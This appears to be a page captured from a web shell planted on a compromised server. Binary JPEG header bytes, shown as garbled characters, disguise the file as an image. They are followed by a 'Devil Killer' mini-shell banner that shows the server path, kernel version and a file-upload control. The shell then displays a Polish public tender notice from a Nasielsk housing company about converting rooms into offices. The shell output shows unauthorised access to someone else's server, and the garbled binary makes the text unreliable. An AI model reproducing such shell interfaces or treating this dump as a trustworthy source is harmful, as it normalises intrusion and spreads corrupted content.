JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20200911/584126-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 584126-N-2020 z dnia 2020-09-11 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Nasielskie Budownictwo Mieszkaniowe Sp. z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Adaptacja	pomieszczeń użytkowych	na	pomieszczenia	biurowe	przy	ul.	Kilińskiego	1/3	lok.	16,	05-190	Nasielsk</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Nasielskie Budownictwo Mieszkaniowe Sp. z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">14056778700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Płońska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">24 B lok. 2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">05-190</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Nasielsk</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">23 693 01 43, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">nbm@nasielskiebudownictwo.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 480 67 67</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://nasielskiebudownictwo.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Spółka miejska</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://nasielskiebudownictwo.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://nasielskiebudownictwo.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie,	zgodnie	z	postanowieniami	rozdziału	XI	i	XII	SIWZ</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Nasielskie	Budownictwo	Mieszkaniowe	Sp.	z	o.o.,	ul.	Płońska	24b	lok.	2,	05-190	Nasielsk</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Adaptacja	pomieszczeń użytkowych	na	pomieszczenia	biurowe	przy	ul.	Kilińskiego	1/3	lok.	16,	05-190	Nasielsk</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">4/PN/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiot	zamówienia	stanowi	adaptacja	pomieszczeń	użytkowych	na	pomieszczenia	biurowe	przy	ul.	Kilińskiego	1/3	lok.	16	w	Nasielsku.	Zakres	prac	budowlanych	obejmuje	w	szczególności:	- demontaż	istniejących	ścian	działowych	wg	dokumentacji	rysunkowej	- demontaż	istniejącej	posadzki	-demontaż	drzwi	zewnętrznych	i	wewnętrznych	(wraz	z	ościeżnicami)	- montaż	drzwi	zewnętrznych	(wraz	z	ościeżnicami)	- murowanie	ścian	działowych	(wg	dokumentacji)	-montaż	drzwi	wewnętrznych	(wraz	z	ościeżnicami)	- wykonanie	instalacji	elektrycznej	wg	wytycznych	Zamawiającego	- wykonanie	instalacji	elektrycznej	niskoprądowej	wg	wytycznych	Zamawiającego	- wykonanie	instalacji	sanitarnej	wg	wytycznych	Zamawiającego	- montaż	sufitu	podwieszanego	(wraz	z	oprawami	oświetleniowymi)	-wykonanie	suchych	tynków	gipsowych	płyta g-k	na	kleju	(ściany	istniejące)	- wykonanie	izolacji	ochronnej	podposadzkowej	(folia	budowlana)	- wykonanie	warstwy	wyrównującej	(wylewka	samopoziomująca)	- malowanie	ścian	wg	wytycznych	Zamawiającego	- wykonanie	posadzki	docelowej	(płytki	gres)	- montaż urządzeń	końcowych	instalacji	elektrycznej	- montaż	urządzeń	końcowych	instalacji	sanitarnej	-montaż	klimatyzacji	Szczegółowy	opis	przedmiotu	zamówienia	zawiera	dokumentacja	techniczna	stanowiąca	załącznik	nr	6	do	SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45453000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45442100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45450000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332400-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">70</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1.	Wykonawca	jest	zobowiązany	do	zrealizowania	Przedmiotu	Umowy	w	terminie	70	dni	od	dnia	protokolarnego	przejęcia	od	Zamawiającego	Terenu	budowy.	Teren	budowy	zostanie	przekazany	w	terminie	2	dni	od	daty	zawarcia	Umowy.	2.	Jako zrealizowanie	Przedmiotu	Umowy	rozumie	się	wykonanie	wszystkich	czynności,	w	tym	wszelkich	prac	i	robót,	składających	się	na	Przedmiot	Umowy,	dopełnienie	wszelkich	przewidzianych	prawem	czynności	wymaganych	dla	dopuszczenia	Przedmiotu	Umowy	do	użytkowania.	3.	Za	termin	realizacji	Przedmiotu	Umowy	uznaje	się	datę	podpisania	protokołu	odbioru	końcowego	Przedmiotu	Umowy</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający	nie	stawia	wymagań	w	tym	zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Określenie	warunków: Wykonawca	spełni	warunek	udziału	w	postępowaniu	dotyczący	sytuacji	ekonomicznej	lub	finansowej,	jeżeli	wykaże,	że	posiada	środki	finansowe	lub	zdolność	kredytową	w	wysokości	100	000,00	PLN	(sto	tysięcy	złotych).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zdolność	techniczna:	Warunek	zostanie	spełniony	jeśli	Wykonawca	wykaże,	że	nie	wcześniej	niż	w	okresie	ostatnich	pięciu	lat	przed	upływem	terminu	składania	ofert,	a	jeżeli	okres	prowadzenia	działalności	jest	krótszy	- w	tym	okresie,	wykonał	co	najmniej	jedną	robotę	budowlaną	polegającą	na	budowie/przebudowie/rozbudowie/remoncie	obiektu	kubaturowego	o	wartości	co	najmniej	100	000,00	zł	brutto	(sto	tysięcy	złotych	brutto).	Zdolność	zawodowa:	Wykonawca	musi	wskazać	osobę,	która	będzie	uczestniczyć	w	wykonywaniu	zamówienia,	legitymującą	się	kwalifikacjami	zawodowymi	i	doświadczeniem	odpowiednim	do	funkcji,	jakie	zostaną	jej	powierzone.	Wykonawca	na	funkcjęwymienioną	poniżej,	wskaże	osobę,	którą	musi	mieć	dostępną	na	etapie	realizacji	zamówienia,	spełniającą	następujące	wymagania:	Kierownik	Budowy	(Przedstawiciel	Wykonawcy)	posiadający:	•	uprawnienia	budowlane	do	kierowania	robotami	budowlanymi	bez	ograniczeń	w	specjalności	konstrukcyjno-budowlanej	lub	równoważne	wydane	na	podstawie	wcześniej	obowiązujących	przepisów,	•	doświadczenie	przy	realizacji	min.	2	zadań	obejmujących	budowę	/	przebudowę	/	rozbudowę	/	remont	obiektu	kubaturowego	o	wartości	robót	co	najmniej	100	000,00	zł	brutto	(każde	zadanie).	Uprawnienia	posiadane	przez	osoby	wskazane	powyżej,	w	wymaganym	zakresie,	powinny	być	zgodne	z	ustawą	z	dnia	7	lipca	1994	r.	Prawo	budowlane	(t.j.	Dz.U.	z	2019	r.	poz.	1186	ze	zm.)	oraz	aktualnym	obowiązującym	rozporządzeniem	Ministra	Inwestycji	i	Rozwoju	w	sprawie	przygotowania	zawodowego	do	wykonywania	samodzielnych	funkcji	technicznych	w	budownictwie	z	dnia	29	kwietnia	2019	roku	(Dz.	U.	z	2019	r.	poz.	831)	lub	równoważne	wydane	na	podstawie	wcześniej	obowiązujących	przepisów.	W	każdym	przypadku,	gdy	wymagane	jest	posiadanie	określonych	uprawnień	budowlanych,	przez	osobę	wskazaną	do	pełnienia	jakiejkolwiek	funkcji	wymienionej	powyżej,	Zamawiający	dopuszcza	posiadanie	przez	wskazane	osoby:	- uprawnień	równoważnych	względem	wymaganych,	które	zostały	wydane	na	podstawie	wcześniej	obowiązujących	przepisów	lub:	- uprawnień	równoważnych	względem	wymaganych,	uznanych	przez	właściwy	organ	zgodnie	z	ustawą	z	dnia	22	grudnia	2015	r.	o	zasadach	uznawania	kwalifikacji	zawodowych	nabytych	w	państwach	członkowskich	Unii	Europejskiej	(t.j.	Dz.U.	z	2016	r.	poz.	65)	lub:	- uprawnień	równoważnych	względem	wymaganych,	nabytych	w	innym	niż	Rzeczypospolita	Polska	państwie	członkowskim	Unii	Europejskiej,	państwie	członkowskim	Europejskiego	Porozumienia	o	wolnym	Handlu	(EFTA),	- stronie	umowy	o	Europejskim	Obszarze	Gospodarczym	lub	Konfederacji	Szwajcarskiej	i	której	na	mocy	odrębnych	przepisów	przysługuje	prawo	do	świadczenia	usług	transgranicznych	na	terytorium	Rzeczypospolitej	Polskiej.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH 